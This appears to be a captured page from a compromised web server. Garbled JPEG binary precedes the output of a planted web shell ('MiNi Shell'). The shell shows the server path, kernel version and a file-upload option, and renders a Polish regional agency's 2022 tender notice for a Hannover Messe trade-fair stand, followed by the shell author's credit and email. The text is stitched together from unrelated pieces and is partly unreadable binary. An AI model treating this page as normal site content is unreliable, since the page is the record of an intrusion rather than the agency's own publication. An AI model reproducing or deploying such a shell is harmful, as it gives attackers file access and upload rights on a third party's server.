JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220421/0012969901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie zabudowy i organizacja stoiska targowego na targach Hannover Messe 2022 w Hanowerze, Niemcy, w dniach 30 maja – 2 czerwca 2022 r., w ramach projektu Power up Your Business in Małopolska 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Małopolska Agencja Rozwoju Regionalnego S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350239017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kordylewskiego 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-542</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@marr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.marr.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> rozwój regionalny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie zabudowy i organizacja stoiska targowego na targach Hannover Messe 2022 w Hanowerze, Niemcy, w dniach 30 maja – 2 czerwca 2022 r., w ramach projektu Power up Your Business in Małopolska 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a9f738f3-c162-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00129699</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Małopolskiego na lata 2014-2020, poddziałanie 3.3.1, projekt „Power up Your Business in Małopolska 2” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://marr.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przekazywanie korespondencji odbywa się elektronicznie: na adres e-mail: za pośrednictwem Platformy znajdującej się pod adresem: https://marr.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>Zamawiający nie przewiduje innegosposobu komunikowania niż elektroniczny.2.Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę dostarczenia wiadomości na<br/>adres e-mail Zamawiającego lub ichzłożenia/wysłania na Platformie.3.Ogólne zasady korzystania z Platformy: a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie MARR S.A.; https://marr.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.b)<br/>Wykonawca po wybraniu opcji„Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawcazakłada konto; podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. c)Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. d)Po założeniu konta Wykonawca ma<br/>możliwość złożenia Oferty w postępowaniu. 4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ.Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. W celu zadania pytania, Wykonawca klika<br/>lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Otwiera się okno, w którym należy uzupełnić dane Wykonawcy, temati treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;Pytanie wysłane&#34;. Zamawiający jest obowiązany udzielić wyjaśnieńniezwłocznie, jednak nie później niż na 2 dni przed upływem terminu<br/>składania ofert pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. 5.Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądźinformacje o dokonaniu modyfikacji SWZ, Zamawiający<br/>przekażeWykonawcom za pośrednictwem Platformy Zakupowej. 6.W przypadku wątpliwości związanych z zasadami korzystania z Platformy Wykonawca winien skontaktować się z dostawcą Platforma<br/>zakupowa MARR S.A. tel. +48 22 257 2223 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl. 7.Dopuszczalny format podpisu elektronicznego: a) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,b) dopuszcza się podpisanie dokumentów w<br/>formacie innym niż „pdf&#34;, wtedy będziewymagany oddzielny plik z podpisem. 8.Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej: a)Stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; b)Komputer klasy PC lub MAC, o konfiguracji: pamięć min 2GB Ram, procesorIntel IV 2GHZ, jeden z systemów operacyjnych - MS<br/>Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; c)Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10.0;d)Włączona obsługa JavaScript; e)Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. 9.Dopuszczalne formaty przesyłanych danych tj. plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.10.Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Admin.danych osob. przetwarzanych w ramach zbioru<br/>danych „RPO WM 2014–2020”, jest Zarząd Województwa Małopolskiego stanowiący Instytucję Zarządzającą dla RPOWM na lata 2014-2020 z siedzibą przy ul. Basztowej 22, Kraków. 2.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. „c” i lit. „f” RODO do postęp.<br/>Wykonanie zabudowy i organizacja stoiska targowego na targach Hannover Messe 2022 w Hanowerze, Niemcy, w dniach 30 maja – 2 czerwca 2022 r., <br/>w ramach projektu Power up Your Business in Małopolska 2; 3.Administratorem danych osobowych przetwarzanych w ramach zbioru danych „Centralny system<br/>teleinformatyczny wspierający realizację programów operacyjnych” jest minister właściwy do spraw rozwoju w Warszawie ul. Wspólna2/4. 4.Osoba, której dane dotyczą może skontaktować się z IOD wyznaczonym przez Administratora, wysyłając wiadomość na: iodo@umwm.malopolska.pl lub<br/>pisemnie: IODO UMWM, ul. Racławicka 56, 30-017 Kraków.5.Administrator wyznaczył IOD, z którym można kontaktować się wysyłając wiadomość na adres iodo@miir.gov.pl. 6.Dane osob. przetwarzane będą w celu realizacji RPOWM, ewaluacji, kontroli i audytu oraz prowadzenia dokumentacji i<br/>komunikacji oraz sprawozdawczości związanej z tym projektem. 7.Podstawą prawną przetwarzania danych osob.jest art. 6 ust. 1 lit.c),art. 9 ust 2 lit g)Rozp. PE i Rady (UE) 2016/679– dalej „RODO”; 8.Dane osob.będą przekazywane IZ dla RPOWM na lata 2014-2020 z siedzibą w Krakowie<br/>ul.Basztowa 22, Kraków, MCP wdrażającemu Poddziałanie 3.3.1RPOWM na lata 2014-2020 oraz podmiotowi prowadzącemu ewaluację tego projektu. 9.Dane osob. będą przechowywane do momentu zakończenia realizacji projektu i jego rozliczeniaido momentu zamknięcia i rozliczenia RPOWM 2014- 2020 oraz zakończenia okresu trwałościprojektu i okresu archiwizacyjnego w zależności od tego, która z tych dat nastąpi później. 10.W zakresie prawa do żądania od admin. dostępu do DO dotyczących<br/>swojej osoby, ich sprostowania, usunięcia lub ograniczenia przetwarzania, prawa do przenoszenia danych, prawa te przysługują Pani/Panu z zastrzeżeniem ograniczeń przewidzianych w art. 17 ust 3 lit<br/>b i d Rozp.RODO z uwagi na podstawę prawną przetwarzania. 11.Prawo do wniesienia skargi do PrezesaUODO, jeżeli uważa Pani/Pan, że przetw. danych osob.narusza przepisy prawa. 12.Podanie danych osob.jest dobrowolne, natomiast niezbędne w celu uczestniczenia w wydarzeniu. 13.Pani/Pana<br/>dane osob.nie będą podlegały zautomat.procesom podejmowania decyzji, w tym profilowaniu.14.Odbiorcami Pani/Pana danych osobowych będą osoby/podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy PZP 15.obowiązek<br/>podania danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w Pzp; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;16.w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO; 17.posiada Pani/Pan:-na podstawie art. 15 RODO prawo dostępu do swoich danych os.;−na podstawie art.16 RODO prawo do sprostowania swoich danych os.;-na podstawie art. 18 RODO prawo żądania od admin. ograniczenia przetwarzania danych os. z zastrz.<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; −prawo do wniesienia skargi do PrezesaUODO, gdy uzna Pani/Pan, że przetwarzanie danych osob. Pani/Pana dotyczących narusza przepisy RODO;18.nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych;−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetw.danych osob., gdyż podstawą prawną przetwarzania danych osob.jest art. 6 ust. 1 lit. c RODO. Odbiorcą danych osob. będą upoważ. pracownicy MARRS.A. w Krakowie oraz Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie ul. Domaniewska 49, numerem KRS: 0000041441, właściciel Platformy Zakupowej, na której prowadzi się<br/>postępowanie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zabudowy i organizacja stoiska targowego na targach Hannover Messe 2022 w Hanowerze, Niemcy, w dniach 30 maja – 2 czerwca 2022 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79950000-8 - Usługi w zakresie organizowania wystaw, targów i kongresów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-03</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie opiekuna targów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> formularz oferty, pełnomocnictwo (jeżeli dotyczy), zobowiązanie innego podmiotu wraz z oświadczeniem tego podmiotu o braku podstaw wykluczenia tego podmiotu oraz odpowiednio o spełnianiu warunków udziału w postępowaniu, o których mowa w Rozdziale VIII pkt. 3 i 6 SWZ (jeżeli dotyczy), w przypadku wykonawców wspólnie ubiegających się o zamówienie należy załączyć oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale VII pkt. 1SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana umowy może nastąpić na zasadach określonych w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych oraz dopuszcza się zmianę istotnych postanowień umowy w następującym zakresie i przypadkach:<br/>a)	zmiany terminu określonego w § 3 ust. 2 w przypadku spowodowanym okolicznościami niezależnymi od Stron, jeżeli zmiana terminu nie koliduje z innymi terminami przewidzianymi <br/>w umowie lub regulaminie targów;<br/>b)	zmiany elementów lub założeń technicznych dotyczących stoiska targowego (zabudowy, wystroju i wyposażenia stoiska) w razie konieczności zastąpienia elementów innymi elementami lub zmiany założeń technicznych, przewidzianych w warunkach zamówienia, z przyczyn technicznych lub innych przyczyn niezależnych od Stron pod warunkiem uzgodnienia równoważnej ilości i jakości tych elementów lub założeń;<br/>c)	zmiany w zakresie wyposażenia stoiska promocyjnego w razie przeszkód technicznych lub innych przyczyn niezależnych od Stron (np. braku kompatybilności plików);<br/>d)	zmiany sposobu i warunków realizacji przedmiotu umowy poprzez dostosowanie do stanu zgodnego z prawem lub dokumentami programowymi w przypadku zmian aktów normatywnych lub dokumentów programowych Regionalnego Programu Operacyjnego Województwa Małopolskiego.<br/>2.	Okoliczności opisane w ust. 1 stanowią przypadki zmian, na które Zamawiający może wyrazić zgodę, jednakże nie stanowią zobowiązania do wyrażenia takiej zgody.<br/>3.	Warunkiem przystąpienia do negocjacji w przedmiocie zmiany umowy z przyczyn określonych w ust. 2 jest złożenie przez jedną ze Stron propozycji zmiany ze wskazaniem okoliczności i zakresu zmiany.<br/>4.	Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności, z zastrzeżeniem wyjątków przewidzianych w umowie.<br/>5.	Nie stanowią istotnej zmiany i nie wymagają zawarcia pisemnego aneksu do umowy zmiany danych teleadresowych Stron i osób upoważnionych do kontaktów związanych z realizacją umowy lub zmiany osób upoważnionych przez Zamawiającego do podpisu protokołów wskazanych w § 3 ust. 2 oraz § 4 ust. 5. Do skuteczności tych zmian wymagane jest pisemne zawiadomienie drugiej Strony. Do chwili zawiadomienia o zmianie danych teleadresowych korespondencję przesłaną na dotychczasowy adres uznaje się za doręczoną. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-29 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com